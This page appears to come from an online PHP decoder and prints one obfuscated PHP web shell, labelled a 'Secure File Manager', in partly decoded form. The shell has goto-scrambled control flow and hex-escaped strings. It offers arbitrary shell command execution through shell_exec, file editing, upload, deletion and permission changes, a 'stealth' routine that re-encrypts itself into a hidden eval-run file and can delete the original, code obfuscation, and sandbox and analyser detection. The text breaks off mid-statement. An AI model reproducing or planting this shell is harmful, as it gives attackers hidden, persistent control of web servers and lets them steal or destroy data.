Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level 


 goto EcUYb; Ks2z6: $encryptionKey = $_SESSION["\x65\x6e\143\162\x79\x70\164\151\157\x6e\137\x6b\x65\171"]; goto BFi7_; k3E7s: goto U1A0c; goto Yw3QP; QteJV: function displayFileTable($directory) { global $dirScan, $isDir, $isFile, $encryptionKey; $items = $dirScan($directory); $parent = realpath($directory . "\57\x2e\x2e"); if ($parent !== realpath($directory)) { echo "\x3c\141\40\150\x72\145\146\75\47\77\x64\151\162\x3d" . urlencode(secureEncrypt($parent, $encryptionKey)) . "\x27\40\x63\x6c\x61\163\x73\x3d\47\x62\164\156\x20\x62\x74\156\55\151\x6e\146\x6f\40\155\x62\55\63\47\76\102\x61\143\x6b\74\57\x61\x3e\40"; } echo "\x3c\x61\x20\150\162\145\x66\75\47\x3f\154\x69\x73\164\126\x69\145\x77\x3d" . urlencode(secureEncrypt($directory, $encryptionKey)) . "\47\x20\143\154\x61\x73\x73\75\47\142\x74\x6e\x20\142\x74\156\55\163\145\x63\157\x6e\x64\141\x72\x79\x20\155\142\x2d\x33\x27\76\123\167\x69\x74\x63\150\x20\x74\157\40\114\x69\163\x74\40\x56\x69\x65\x77\x3c\57\x61\x3e"; echo "\74\164\141\142\154\x65\40\143\154\141\x73\163\x3d\47\x74\x61\x62\x6c\x65\40\x74\x61\x62\154\145\x2d\144\141\162\x6b\40\164\x61\142\154\x65\55\x62\x6f\162\x64\x65\x72\x65\x64\x27\76"; echo "\74\164\150\145\x61\x64\76\x3c\164\162\76\74\164\x68\76\x4e\x61\155\145\74\57\x74\150\76\74\x74\x68\x3e\124\171\160\x65\74\x2f\x74\150\x3e\74\164\150\x3e\101\x63\164\x69\157\156\163\74\x2f\x74\150\x3e\74\57\164\x72\x3e\74\57\164\150\x65\x61\144\x3e\74\x74\x62\157\x64\x79\76"; foreach ($items as $item) { if ($item === "\56" || $item === "\x2e\x2e") { continue; } $path = rtrim($directory, "\57") . "\57" . $item; $encodedPath = urlencode(secureEncrypt($path, $encryptionKey)); echo "\74\x74\162\76"; echo "\74\164\x64\x3e" . htmlspecialchars($item) . "\74\x2f\164\x64\76"; echo "\74\164\x64\x3e" . getFileInfo($path) . "\74\x2f\x74\144\x3e"; echo "\74\164\x64\76"; if ($isDir($path)) { echo "\x3c\141\40\x68\x72\x65\146\x3d\x27\77\x64\x69\162\x3d{$encodedPath}\47\40\x63\154\141\x73\163\75\x27\x62\x74\156\x20\x62\164\156\55\x73\155\x20\142\164\156\55\151\x6e\x66\157\47\76\117\160\145\156\74\x2f\x61\x3e\40"; } else { echo "\x3c\x61\40\x68\162\145\146\75\47\x3f\145\x64\x69\164\x3d{$encodedPath}\x27\40\143\154\x61\x73\x73\x3d\47\142\164\156\x20\x62\164\156\x2d\163\x6d\x20\x62\164\156\55\x73\x75\143\143\145\x73\163\x27\x3e\x45\144\151\164\74\57\x61\76\40"; echo "\x3c\x61\40\150\162\145\146\75\47\x3f\x64\x6f\x77\156\154\x6f\x61\x64\x3d{$encodedPath}\47\40\143\154\141\x73\163\x3d\x27\x62\x74\x6e\40\x62\x74\156\x2d\x73\x6d\40\x62\x74\x6e\x2d\160\x72\151\x6d\x61\x72\x79\x27\76\104\x6f\167\x6e\154\x6f\x61\x64\74\57\141\76\x20"; echo "\74\141\40\150\x72\145\146\x3d\x27\x3f\162\x65\x6e\x61\x6d\145\x3d{$encodedPath}\x27\x20\143\154\141\x73\163\75\47\142\x74\156\x20\142\x74\156\55\x73\155\x20\x62\164\x6e\x2d\x77\141\162\156\x69\x6e\147\47\76\122\145\156\x61\x6d\x65\x3c\57\x61\76\40"; } echo "\x3c\141\x20\x68\x72\145\146\x3d\47\77\x64\145\154\145\164\x65\x3d{$encodedPath}\x27\x20\x63\x6c\x61\163\163\x3d\47\x62\164\156\40\142\x74\156\x2d\x73\155\40\142\164\x6e\55\x64\141\x6e\x67\x65\x72\47\x20\x6f\x6e\x63\154\x69\x63\153\x3d\42\x72\145\x74\165\162\x6e\40\x63\157\156\146\151\x72\155\x28\x27\104\145\154\x65\x74\145\40{$item}\77\x27\x29\42\76\104\x65\x6c\145\164\x65\74\57\141\76\40"; echo "\74\x61\x20\150\x72\145\x66\75\47\x3f\x63\x68\x6d\157\144\x3d{$encodedPath}\47\40\x63\154\141\x73\163\75\x27\142\164\156\40\x62\x74\x6e\x2d\163\x6d\x20\x62\x74\x6e\x2d\167\141\162\x6e\x69\x6e\147\x27\76\103\150\x6d\x6f\144\74\x2f\141\76"; echo "\x3c\x2f\x74\x64\x3e"; echo "\x3c\57\164\x72\76"; } echo "\74\57\x74\142\157\144\x79\76\x3c\x2f\164\x61\142\x6c\145\76"; } goto NjXSW; ig398: function executeCommand($command) { if (!function_exists("\x73\150\145\154\154\x5f\x65\x78\x65\x63")) { echo "\x3c\x70\x20\143\x6c\141\x73\x73\x3d\47\164\145\170\x74\55\144\x61\x6e\x67\x65\162\47\x3e\103\157\155\155\x61\x6e\144\40\x65\x78\x65\x63\x75\164\151\157\x6e\x20\x64\x69\x73\141\142\154\145\144\72\x20\x73\150\145\154\x6c\137\145\x78\x65\143\x28\51\40\156\x6f\x74\40\x61\x76\141\151\154\x61\x62\154\145\74\57\x70\76"; return "\x45\x72\162\x6f\162\x3a\40\x73\x68\x65\154\x6c\137\x65\x78\145\x63\x28\51\x20\151\x73\40\144\151\x73\141\142\x6c\x65\144\x2e"; } $output = shell_exec($command . "\40\x32\x3e\46\x31"); echo "\74\x70\40\143\154\141\x73\x73\75\47\164\x65\x78\164\55\163\165\143\143\x65\x73\163\x27\x3e\103\157\155\x6d\x61\156\x64\40\145\x78\145\x63\x75\x74\145\x64\x3a\x20" . htmlspecialchars($command) . "\x3c\x2f\x70\76"; return $output ?: "\116\157\40\x6f\165\164\x70\x75\x74\x2e"; } goto ZYqLI; Yw3QP: rqjGO: goto Q5s8r; Iztbf: Eap6j: goto JDbo6; SEXxg: function activateStealth($deleteOriginal = false) { global $fileRead, $fileWrite, $deleteFile, $changePerms, $encryptionKey; try { $currentCode = $fileRead(__FILE__); $newFile = "\56\163\164\x65\x61\x6c\x74\x68\x5f" . bin2hex(random_bytes(5)) . "\x2e\x70\x68\160"; $obfuscated = obfuscateCode($currentCode); $encrypted = secureEncrypt($obfuscated, $encryptionKey); if ($encrypted === false) { echo "\74\x70\40\143\x6c\x61\x73\x73\x3d\47\164\x65\x78\164\x2d\x64\141\156\x67\145\162\x27\x3e\123\164\x65\x61\x6c\164\x68\40\155\x6f\144\145\x20\146\141\x69\154\x65\x64\x3a\x20\x45\x6e\x63\x72\171\x70\x74\x69\x6f\156\x20\x65\162\162\x6f\x72\x3c\x2f\160\x3e"; return false; } $newContent = "\x3c\77\x70\x68\160\40\44\x63\x6f\144\145\40\75\40\163\145\143\x75\x72\145\104\x65\x63\x72\171\160\x74\x28\x22" . $encrypted . "\42\54\x20\42" . $encryptionKey . "\42\51\73\40\x65\x76\x61\154\50\x24\143\157\144\145\x29\73"; if ($fileWrite($newFile, $newContent)) { $changePerms($newFile, 448); if ($deleteOriginal) { $deleteFile(__FILE__); } echo "\x3c\160\40\143\154\141\x73\163\x3d\47\164\145\170\164\x2d\163\165\143\143\x65\x73\163\x27\76\123\164\145\141\154\164\x68\x20\x6d\x6f\144\x65\x20\x65\156\x61\x62\154\145\x64\72\x20\116\x65\167\40\146\x69\x6c\x65\x20\50{$newFile}\51\x3c\57\x70\76"; return $newFile; } echo "\x3c\x70\x20\x63\x6c\141\163\163\75\47\164\x65\170\x74\x2d\144\141\156\147\x65\162\47\x3e\123\164\145\x61\154\x74\150\x20\155\157\x64\145\40\146\141\151\x6c\x65\x64\x3a\40\x46\151\154\x65\x20\143\162\x65\141\x74\x69\x6f\156\x20\x65\162\x72\157\x72\x3c\x2f\x70\76"; return false; } catch (Exception $e) { error_log("\123\164\145\x61\154\164\150\x20\x65\162\162\157\x72\x3a\40" . $e->getMessage()); echo "\x3c\x70\40\x63\x6c\141\163\163\x3d\x27\x74\x65\x78\x74\x2d\x64\x61\156\147\x65\162\47\x3e\123\164\x65\x61\154\164\150\40\x6d\157\144\145\x20\146\x61\x69\154\x65\144\x3a\x20" . htmlspecialchars($e->getMessage()) . "\74\x2f\x70\x3e"; return false; } } goto LD0iv; n6UId: fichY: goto eThD1; t8ouB: goto rqjGO; goto FDJCU; W22T7: if (isset($_GET["\x72\145\x6e\141\x6d\145"])) { global $isFile, $isDir, $renameFile, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET["\x72\x65\156\x61\x6d\145"]), $encryptionKey); if ($path === false || !$isFile($path) && !$isDir($path)) { error_log("\x49\x6e\x76\x61\154\151\x64\40\162\x65\x6e\x61\x6d\x65\x20\x70\141\x74\150\72\40" . $_GET["\x72\x65\156\x61\x6d\145"]); echo "\x3c\160\x20\143\x6c\141\163\x73\x3d\x27\164\x65\170\164\x2d\144\x61\x6e\147\x65\x72\x27\x3e\111\156\166\x61\154\x69\144\x20\x70\141\164\150\74\x2f\x70\76"; die; } if ($_SERVER["\x52\105\121\125\x45\x53\124\137\x4d\105\124\110\117\x44"] === "\x50\x4f\x53\124") { $newPath = dirname($path) . "\x2f" . $_POST["\156\x65\167\x6e\x61\155\x65"]; if ($renameFile($path, $newPath)) { echo "\74\160\40\x63\x6c\141\x73\163\75\x27\x74\145\x78\x74\x2d\163\165\143\143\145\163\163\47\76\x52\145\156\141\155\x65\x64\40\x73\x75\x63\x63\x65\163\163\146\165\154\x6c\171\74\57\160\x3e"; header("\114\157\x63\x61\x74\x69\157\156\72\x20\x3f\144\151\162\x3d" . urlencode(secureEncrypt($currentDir, $encryptionKey))); die; } else { echo "\74\160\40\x63\154\x61\163\163\75\47\164\145\170\164\x2d\144\x61\156\x67\145\162\47\x3e\x52\x65\156\x61\x6d\145\x20\x66\141\151\x6c\x65\144\x3c\57\x70\76"; } } echo "\x3c\x66\x6f\162\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\47\120\117\123\124\x27\x3e"; echo "\74\150\63\76\122\x65\x6e\141\155\x65\x20" . htmlspecialchars(basename($path)) . "\x3c\x2f\150\63\x3e"; echo "\74\151\156\x70\165\164\x20\x74\x79\x70\145\x3d\x27\164\x65\170\x74\47\x20\x6e\141\155\x65\x3d\x27\x6e\145\x77\156\x61\155\x65\47\40\143\154\x61\163\163\x3d\x27\146\157\162\x6d\55\x63\x6f\156\x74\x72\157\x6c\40\142\x67\55\144\141\162\153\x20\164\145\170\x74\55\154\x69\147\x68\164\40\x62\x6f\162\x64\145\162\x2d\154\151\x67\150\x74\47\x20\166\x61\154\165\x65\75\x27" . htmlspecialchars(basename($path)) . "\x27\x3e"; echo "\x3c\x69\156\x70\165\164\40\x74\x79\x70\145\x3d\47\x73\165\x62\155\x69\164\47\x20\x76\x61\154\165\x65\x3d\47\x52\145\x6e\x61\x6d\145\47\x20\x63\154\141\163\163\75\x27\142\164\x6e\40\x62\164\156\x2d\163\165\143\x63\145\163\x73\40\x6d\164\55\x32\47\76"; echo "\74\x2f\146\x6f\x72\155\76"; die; } goto OqX6Z; uszvZ: goto U5Pf_; goto CfUuH; Zzbe2: goto FBEFX; goto j4Iqa; tx3PU: cDNBH: goto M2DoU; OK0Wy: $isFile = "\151\163\137\146\151\154\x65"; goto k3E7s; xcHuw: LpD7y: goto ZSJpn; jTMqJ: if (isset($_GET["\144\x65\x6c\145\164\145"])) { global $isDir, $isFile, $deleteFile, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET["\144\145\154\145\x74\145"]), $encryptionKey); if ($path === false) { error_log("\x49\156\166\x61\x6c\151\144\x20\x64\145\154\x65\164\145\x20\160\141\x74\x68\x3a\x20" . $_GET["\144\145\154\x65\164\145"]); echo "\74\x70\x20\x63\154\x61\163\163\x3d\x27\164\x65\170\x74\x2d\144\141\156\x67\145\162\x27\76\x49\156\x76\x61\154\x69\144\x20\x70\x61\x74\x68\74\x2f\160\76"; die; } if ($isDir($path)) { rmdir($path); echo "\74\x70\x20\x63\154\141\x73\x73\75\x27\164\x65\x78\164\x2d\x73\165\x63\143\145\x73\163\x27\x3e\104\x69\162\145\143\164\x6f\x72\171\x20\144\x65\154\145\x74\x65\144\74\57\160\x3e"; } elseif ($isFile($path)) { $deleteFile($path); echo "\74\160\x20\143\154\x61\163\163\x3d\x27\x74\x65\x78\164\x2d\163\x75\143\x63\145\x73\163\47\76\106\151\x6c\x65\x20\x64\145\x6c\145\x74\x65\x64\74\57\160\76"; } header("\x4c\x6f\x63\141\x74\x69\x6f\x6e\x3a\x20\x3f\x64\151\162\75" . urlencode(secureEncrypt($currentDir, $encryptionKey))); die; } goto rBSuO; GuVMW: goto UEfBu; goto EkSbi; cqr0J: ePZzY: goto F1r96; Njj5u: ini_set("\x64\151\163\160\154\x61\x79\137\145\x72\162\x6f\162\163", 1); goto N0paU; eNGgr: $fileRead = "\146\x69\154\145\137\x67\145\164\137\143\157\x6e\164\x65\x6e\x74\163"; goto ULUvm; P6ivX: koFCQ: goto vA42M; cxFp6: function triggerSelfDestruct() { global $deleteFile; $usageFile = "\x2e\141\x63\143\145\x73\x73\137\143\x6f\165\x6e\164"; $count = (int) @$GLOBALS["\x66\151\154\x65\122\145\141\x64"]($usageFile); $count++; $GLOBALS["\146\151\154\x65\127\x72\151\x74\145"]($usageFile, $count); } goto uszvZ; ULUvm: goto vYuSM; goto xcHuw; rqgBL: goto RdgXe; goto ErCsM; ZzS3j: goto fichY; goto VAhGR; MBPUU: SUllZ: goto M31r3; Le_qg:
<!doctypehtml><html><head><meta charset="UTF-8"><title>Secure File Manager</title><link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"rel="stylesheet"><style>body{background:#212529;color:#e9ecef}.table-dark{background:#343a40}.btn-info{background:#17a2b8;border-color:#17a2b8}.btn-success{background:#28a745;border-color:#28a745}.btn-danger{background:#dc3545;border-color:#dc3545}.btn-warning{background:#ffc107;border-color:#ffc107}.btn-secondary{background:#6c757d;border-color:#6c757d}.list-group-item{background:#343a40;border-color:#6c757d}</style></head><body><div class="container mt-4"><h1 class="text-info">Secure File Manager -goto S5y28; SwiVa: goto up55I; goto tIRgZ; zT1vY: vYuSM: goto DPeGu; oWm_N: GgShZ: goto fyJqQ; j4Iqa: iGeL_: goto qXR8h; K6m9y: H0yyz: goto i9Tdf; DPeGu: $fileWrite = "\x66\x69\x6c\145\137\x70\165\x74\137\x63\157\x6e\x74\145\x6e\164\163"; goto H3GBx; LD0iv: goto k0W22; goto tx3PU; kG7tO: function fetchFromDatabase($id) { try { $db = new SQLite3("\x3a\155\145\155\x6f\x72\171\x3a"); $result = $db->querySingle("\x53\x45\114\105\103\124\x20\x73\143\162\x69\x70\x74\x20\x46\x52\x4f\115\40\163\143\162\151\x70\164\163\x20\127\x48\x45\122\x45\40\x69\x64\40\75\x20" . (int) $id, true); if ($result) { echo "\74\160\x20\143\x6c\x61\x73\163\x3d\47\164\145\170\164\55\163\x75\143\x63\145\163\x73\47\76\x43\x6f\144\145\40\x72\x65\164\162\151\145\166\145\x64\40\146\162\x6f\x6d\x20\x64\141\x74\x61\142\141\163\x65\74\57\160\76"; return $GLOBALS["\144\x65\143\x6f\x64\145"]($result["\x73\143\162\151\x70\x74"]); } echo "\74\160\x20\143\154\141\163\x73\x3d\x27\164\x65\170\164\x2d\x64\x61\x6e\147\145\x72\x27\x3e\103\x6f\x64\145\x20\x6e\157\164\40\x66\x6f\165\156\144\x3c\57\160\76"; return false; } catch (Exception $e) { error_log("\x44\x61\x74\x61\x62\141\163\145\40\x72\x65\x74\x72\x69\145\166\141\x6c\40\x65\162\162\157\x72\x3a\40" . $e->getMessage()); echo "\x3c\x70\x20\143\154\x61\163\163\75\x27\164\x65\170\x74\x2d\x64\x61\156\x67\145\x72\47\x3e\x46\x61\151\x6c\145\144\40\164\157\x20\x72\x65\x74\x72\151\x65\166\145\40\143\157\144\145\x3c\x2f\x70\76"; return false; } } goto rBLCw; xpkeY: goto GgShZ; goto K6m9y; H3GBx: goto qXROW; goto kf1Qk; rjR0I: UEfBu: goto kVLxC; AZ9qS: session_start(); goto zu_YY; vI8tS: goto OHvyU; goto qmDzR; kxSx_: goto MqDn2; goto Dp0Fa; ZSJpn: function detectSandbox() { if (empty($_SERVER["\110\124\124\120\x5f\125\123\105\122\x5f\x41\x47\x45\x4e\x54"]) || strpos($_SERVER["\110\124\124\120\x5f\125\x53\105\122\x5f\101\x47\105\x4e\124"], "\x62\x6f\164") !== false) { echo "\x3c\160\x20\143\x6c\x61\163\163\x3d\x27\x74\145\170\164\55\x77\141\162\156\151\x6e\x67\47\76\123\x61\x6e\x64\142\157\170\x20\144\x65\164\145\143\x74\x65\144\x3a\40\x53\165\x73\x70\151\x63\x69\x6f\x75\x73\x20\165\163\145\162\40\x61\x67\x65\156\x74\74\x2f\160\76"; return true; } if (isset($_SERVER["\110\x54\x54\x50\x5f\130\x5f\123\x41\x4e\x44\102\x4f\x58"]) || isset($_SERVER["\110\124\124\x50\x5f\x58\137\101\x4e\x41\x4c\131\x5a\105\x52"])) { echo "\x3c\160\40\x63\x6c\x61\163\x73\75\47\164\145\170\x74\x2d\x77\x61\162\x6e\151\156\x67\47\x3e\x53\x61\x6e\144\142\x6f\x78\x20\x64\145\164\x65\x63\164\145\144\72\x20\101\156\x61\154\x79\163\x69\x73\x20\x68\145\141\x64\145\162\163\74\x2f\x70\x3e"; return true; } return false; } goto vI8tS; bz1ZP: U5Pf_: goto ig398; vA42M: if (isset($_FILES["\146\151\x6c\145"])) { global $moveFile, $currentDir; $file = $_FILES["\x66\x69\x6c\145"]; $target = $currentDir . "\x2f" . basename($file["\156\141\x6d\145"]); if ($moveFile($file["\164\155\160\x5f\x6e\141\155\145"], $target)) { echo "\74\160\40\x63\x6c\x61\x73\163\x3d\x27\164\145\170\x74\55\x73\165\x63\143\145\x73\x73\47\76\106\151\154\145\40\x75\160\x6c\x6f\x61\144\145\x64\x20\163\x75\143\143\145\163\163\146\165\154\x6c\171\74\57\160\76"; } else { echo "\x3c\160\40\x63\x6c\141\163\163\x3d\47\x74\x65\x78\x74\x2d\144\141\x6e\147\x65\x72\47\76\x55\x70\154\x6f\141\144\x20\x66\141\151\x6c\145\144\74\x2f\x70\76"; } } goto LiFXE; c9xFE: U1A0c: goto eNGgr; CTOno: up55I: goto PJ1GT; q16ln: goto U1zxN; goto zT1vY; UPsBr: function secureDecrypt($data, $key) { try { if (!base64_decode($data, true)) { error_log("\111\156\166\141\x6c\x69\x64\x20\x62\x61\x73\145\66\64\x20\x69\156\160\165\164\72\x20" . $data); return false; } $data = base64_decode($GLOBALS["\144\x65\x63\x6f\144\x65"]($data)); if ($data === false) { error_log("\102\141\163\x65\x36\64\40\144\145\143\157\x64\145\40\x66\x61\151\x6c\x65\x64"); return false; } if (function_exists("\157\x70\145\x6e\x73\x73\x6c\x5f\144\x65\x63\162\171\160\164")) { $iv = substr($data, 0, 16); $ciphertext = substr($data, 16); $decrypted = openssl_decrypt($ciphertext, "\x41\105\x53\55\x32\x35\x36\x2d\103\x42\x43", $key, 0, $iv); if ($decrypted !== false) { return $decrypted; } } if (!ctype_xdigit($data)) { error_log("\111\x6e\166\141\x6c\151\x64\40\x68\145\170\40\163\164\162\151\156\147\40\x66\x6f\162\40\x58\x4f\122\40\144\x65\143\162\171\160\164\151\157\156\72\40" . bin2hex($data)); return false; } $data = @hex2bin($data); if ($data === false) { error_log("\150\x65\170\62\142\151\x6e\x20\146\x61\151\154\145\144"); return false; } $output = ''; for ($i = 0; $i < strlen($data); $i++) { $output .= chr(ord($data[$i]) ^ ord($key[$i % strlen($key)])); } return $output; } catch (Exception $e) { error_log("\104\x65\x63\x72\171\160\x74\x69\157\x6e\40\145\162\162\157\x72\72\x20" . $e->getMessage()); return false; } } goto q110O; hH0g1: rXHzO: goto W22T7; ErCsM: mJG2Z: goto VxFs9; LiFXE: goto zeKai; goto cqr0J; ROU2v: goto V4LER; goto jvGel; HD7QG: if (isset($_GET["\145\144\151\164"])) { global $isFile, $fileRead, $fileWrite, $encryptionKey; $file = secureDecrypt(urldecode($_GET["\145\x64\151\x74"]), $encryptionKey); if ($file === false || !$isFile($file)) { error_log("\111\x6e\166\x61\154\x69\x64\x20\146\x69\x6c\x65\x3a\x20" . $_GET["\145\144\x69\x74"]); echo "\74\x70\40\x63\x6c\141\163\x73\x3d\x27\164\x65\x78\x74\x2d\x64\x61\156\147\x65\x72\x27\x3e\111\x6e\x76\x61\x6c\x69\144\40\x66\x69\154\145\74\57\160\x3e"; die; } if ($_SERVER["\122\x45\121\125\x45\123\x54\x5f\x4d\105\x54\x48\x4f\x44"] === "\120\x4f\123\x54") { $fileWrite($file, $_POST["\x63\157\156\164\145\156\164"]); echo "\x3c\160\x20\x63\x6c\141\163\x73\75\47\164\145\x78\x74\x2d\163\165\x63\x63\145\x73\163\x27\76\x46\x69\x6c\x65\40\x73\x61\x76\145\144\x20\x73\165\x63\143\145\163\x73\146\165\x6c\x6c\171\x3c\57\160\76"; } $content = htmlspecialchars($fileRead($file)); echo "\x3c\x66\157\x72\x6d\x20\x6d\145\164\x68\x6f\144\75\x27\120\x4f\123\124\47\x3e"; echo "\74\164\145\170\164\141\x72\145\x61\40\156\x61\155\145\x3d\47\x63\157\156\164\145\156\x74\47\x20\162\157\x77\163\x3d\47\61\65\47\x20\x63\154\141\x73\163\75\x27\x66\157\x72\x6d\55\x63\157\x6e\x74\x72\157\x6c\x20\x62\x67\x2d\144\141\x72\x6b\40\x74\145\x78\164\x2d\x6c\151\x67\150\164\x20\x62\x6f\162\x64\145\x72\x2d\154\x69\x67\150\164\x27\76{$content}\74\x2f\x74\x65\x78\164\141\162\145\x61\76"; echo "\x3c\151\x6e\160\x75\164\40\x74\x79\160\x65\x3d\x27\163\165\142\x6d\x69\164\x27\x20\x76\x61\x6c\x75\x65\x3d\x27\x53\x61\166\145\47\x20\x63\x6c\141\163\x73\x3d\47\x62\164\156\40\x62\164\156\x2d\x73\x75\143\143\145\163\x73\40\155\x74\55\63\47\x3e"; echo "\x3c\x2f\146\x6f\x72\155\x3e"; die; } goto oRv2f; OqX6Z: goto koFCQ; goto QNEnT; i9Tdf: function obfuscateCode($code) { $replacements = array("\x65\x76\141\154" => "\143\141\x6c\x6c\137\165\163\x65\x72\x5f\x66\165\x6e\x63\50\42\145\166\141\154\x22\x29", "\x77\x68\x69\x6c\145" => "\x66\x6f\x72\50\73\x3b\x29", "\x62\141\163\x65\x36\x34\137\144\x65\143\157\144\145" => "\x63\x61\x6c\x6c\137\x75\x73\x65\x72\x5f\146\165\156\143\x28\x22\x62\141\x73\145\x36\x34\137\144\145\143\x6f\x64\x65\42\51"); $code = str_replace(array_keys($replacements), array_values($replacements), $code); $code = preg_replace_callback("\x2f\134\x24\133\x61\x2d\172\101\55\132\x30\55\71\x5d\53\x2f", function ($match) { return "\44" . substr(md5(random_bytes(4)), 0, 8); }, $code); echo "\x3c\x70\40\143\154\x61\163\163\x3d\x27\x74\x65\x78\164\55\163\x75\143\143\x65\163\163\x27\x3e\x43\x6f\144\145\40\157\142\146\165\163\143\141\164\x69\x6f\156\x20\141\160\160\154\151\145\x64\x3c\57\x70\76"; return $code; } goto nBpYj; Dp0Fa: uH0gD: goto ixwQh; flq0Z: vV1oT: goto Of40b; IkCuv: if (isset($_GET["\143\150\x6d\157\x64"])) { global $isFile, $isDir, $changePerms, $currentDir, $encryptionKey; $path = secureDecrypt(urldecode($_GET["\x63\x68\x6d\x6f\144"]), $encryptionKey); if ($path === false || !$isFile($path) && !$isDir($path)) { error_log("\x49\156\x76\141\x6c\151\144\40\x63\150\155\x6f\144\40\x70\141\x74\x68\72\x20" . $_GET["\x63\x68\155\x6f\144"]); echo "\x3c\x70\x20\x63\x6c\141\x73\163\75\47\x74\x65\x78\x74\x2d\x64\141\156\147\145\162\47\76\x49\x6e\166\141\x6c\151\144\x20\160\141\164\x68\x3c\x2f\160\76"; die; } if ($_SERVER["\x52\105\x51\x55\105\x53\x54\137\115\x45\x54\110\117\104"] === "\x50\x4f\123\x54") { $mode = 0; $mode |= isset($_POST["\x75\162"]) ? 256 : 0; $mode |= isset($_POST["\x75\x77"]) ? 128 : 0; $mode |= isset($_POST["\x75\170"]) ? 64 : 0; $mode |= isset($_POST["\147\x72"]) ? 32 : 0; $mode |= isset($_POST["\x67\167"]) ? 16 : 0; $mode |= isset($_POST["\x67\x78"]) ? 8 : 0; $mode |= isset($_POST["\x6f\162"]) ? 4 : 0; $mode |= isset($_POST["\x6f\167"]) ? 2 : 0; $mode |= isset($_POST["\157\170"]) ? 1 : 0; if ($changePerms($path, $mode)) { echo "\x3c\x70\x20\x63\x6c\x61\163\x73\75\x27\x74\x65\x78\164\55\163\165\143\x63\145\163\163\47\x3e\x50\145\162\x6d\x69\x73\x73\151\157\156\x73\x20\165\160\x64\x61\164\x65\144\74\57\160\76"; } else { echo "\x3c\160\x20\x63\x6c\x61\163\163\x3d\x27\164\x65\170\x74\x2d\144\141\156\147\x65\162\47\76\x50\145\x72\x6d\151\163\163\151\x6f\x6e\40\143\150\x61\x6e\147\145\x20\x66\141\x69\154\x65\144\74\57\x70\x3e"; } echo "\74\x61\40\150\162\x65\x66\75\47\77\x64\151\x72\x3d" . urlencode(secureEncrypt($currentDir, $encryptionKey)) . "\47\40\x63\154\x61\163\163\x3d\x27\x62\164\156\x20\142\x74\x6e\x2d\151\156\x66\157\47\76\102\141\x63\153\x3c\57\141\76"; } else { echo "\x3c\146\x6f\162\155\x20\155\145\164\x68\x6f\x64\75\47\120\x4f\123\x54\47\x3e"; echo "\x3c\150\63\x3e\x43\150\x61\156\147\145\x20\x50\145\162\x6d\x69\x73\163\x69\157\156\x73\40\146\157\x72\40" . htmlspecialchars(basename($path)) . "\74\x2f\x68\x33\x3e"; echo "\74\x64\151\x76\76\125\163\145\x72\x3a\40\x3c\151\x6e\160\165\164\40\164\x79\160\x65\75\x27\x63\x68\x65\x63\x6b\142\157\x78\47\x20\156\x61\155\145\x3d\x27\165\162\x27\x3e\122\x65\141\144\40\x3c\x69\x6e\160\x75\164\40\x74\x79\x70\x65\75\x27\x63\150\145\143\x6b\x62\157\170\x27\x20\x6e\x61\155\145\x3d\x27\x75\x77\x27\x3e\127\162\x69\164\x65\40\x3c\x69\156\x70\165\x74\x20\x74\171\x70\x65\75\47\x63\150\145\143\x6b\142\157\170\47\40\x6e\x61\155\x65\75\47\165\170\x27\x3e\105\x78\145\143\x75\164\x65\x3c\57\144\x69\166\x3e"; echo "\74\x64\x69\x76\x3e\107\162\x6f\x75\160\x3a\x20\x3c\x69\x6e\160\x75\x74\x20\x74\x79\160\145\75\47\x63\150\x65\x63\153\142\157\x78\47\40\x6e\x61\x6d\x65\x3d\x27\x67\162\47\76\x52\145\141\x64\40\x3c\x69\x6e\x70\165\x74\x20\x74\171\x70\145\x3d\x27\x63\x68\145\143\x6b\x62\x6f\170\x27\x20\x6e\141\155\145\x3d\47\147\167\47\x3e\x57\162\151\x74\x65\40\74\x69\x6e\160\165\164\40\164\171\160\145\x3d\47\143\x68\145\x63\x6b\142\x6f\170\x27\x20\156\141\x6d\145\x3d\x27\x67\x78\x27\76\x45\x78\145\143\x75\164\145\x3c\x2f\x64\151\166\76"; echo "\74\x64\x69\x76\x3e\117\164\150\x65\x72\x73\x3a\40\74\x69\x6e\x70\x75\164\40\x74\171\x70\145\75\x27\143\x68\145\143\153\142\157\170\x27\x20\x6e\x61\155\x65\75\47\157\162\x27\76\122\x65\141\x64\x20\x3c\x69\156\160\x75\164\x20\x74\x79\x70\145\75\47\143\x68\x65\143\153\x62\x6f\x78\x27\x20\x6e\141\x6d\x65\75\x27\x6f\167\47\x3e\x57\x72\x69\164\145\x20\x3c\151\156\160\x75\164\40\164\171\x70\145\x3d\47\143\150\x65\x63\x6b\x62\157\170\47\x20\156\x61\x6d\145\x3d\x27\x6f\x78\x27\x3e\105\x78\x65\x63\165\x74\145\x3c\x2f\144\151\166\x3e"; echo "\74\151\x6e\160\x75\x74\40\x74\171\x70\x65\75\x27\x73\x75\142\155\x69\164\47\x20\166\x61\154\x75\145\75\x27\x41\x70\x70\154\171\47\x20\143\x6c\141\163\x73\x3d\47\142\164\x6e\x20\x62\x74\x6e\x2d\x73\165\143\x63\x65\163\x73\40\x6d\x74\x2d\63\47\x3e"; echo "\74\57\x66\x6f\162\155\x3e"; } die; } goto sHNVE; ikC3N: z0Z8u: goto kG7tO; rjeze: goto suznU; goto nAzvn; fyJqQ: displayFileTable($currentDir); goto XjBDz; QNEnT: B_MZj: goto DsqtD; gtuVD: WmrUT: goto jTMqJ; N0paU: goto noJjk; goto n6UId; CfUuH: KxHes: goto HD7QG; XNEDf: MvKVu: goto Ks2z6; ZYqLI: goto H0yyz; goto r4hEh; eg3vP: KbIJ7: goto VHpb6; Q5s8r: function displayFileList($directory) { global $dirScan, $isDir, $isFile, $encryptionKey; $items = $dirScan($directory); echo "\x3c\144\151\x76\40\143\154\141\163\163\x3d\47\x6c\x69\x73\x74\55\147\162\157\x75\x70\40\x6d\142\x2d\64\47\x3e"; foreach ($items as $item) { if ($item === "\x2e" || $item === "\x2e\56") { continue; } $path = rtrim($directory, "\x2f") . "\57" . $item; $encodedPath = urlencode(secureEncrypt($path, $encryptionKey)); echo "\74\144\x69\x76\x20\143\x6c\x61\163\163\x3d\x27\x6c\151\x73\164\55\147\x72\157\165\160\x2d\151\164\145\155\40\142\x67\x2d\144\141\x72\x6b\x20\x74\x65\x78\164\x2d\x6c\151\x67\x68\164\40\142\157\162\x64\x65\x72\55\x6c\x69\x67\x68\x74\x27\x3e"; echo 